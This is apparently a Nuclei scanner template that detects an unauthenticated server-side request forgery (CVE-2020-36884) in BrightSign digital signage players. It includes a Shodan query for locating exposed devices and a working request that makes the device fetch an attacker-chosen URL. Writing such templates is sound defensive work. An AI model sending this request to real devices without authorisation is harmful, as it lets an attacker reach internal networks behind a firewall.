id: CVE-2020-36884

info:
  name: BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: medium
  description: |
    Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
  impact: |
    Attackers can bypass firewalls and enumerate internal network hosts by forcing arbitrary HTTP requests.
  remediation: |
    Update to a version later than 8.2.26 or the latest available version.
  reference:
    - https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
    - https://www.zeroscience.mk/codes/brightsign_ssrf.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36884
  classification:
    cve-id: CVE-2020-36884
    epss-score: 0.04245
    epss-percentile: 0.89079
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"BrightSign"
  tags: cve,cve2020,ssrf,brightsign,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/speedtest?url={{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: dsl
        dsl:
          - 'contains(body_1, "Downloaded")'
# digest: 4a0a00473045022013f711dcf796cb6cf44c55e5956e65badde9a2f8006dfab7c626053212bbb34e0221009bc13095b3012ceac588d875d5db34f391257e3c7e689f0afa3484622ad1e640:922c64590222798bb761d5b6d8e72950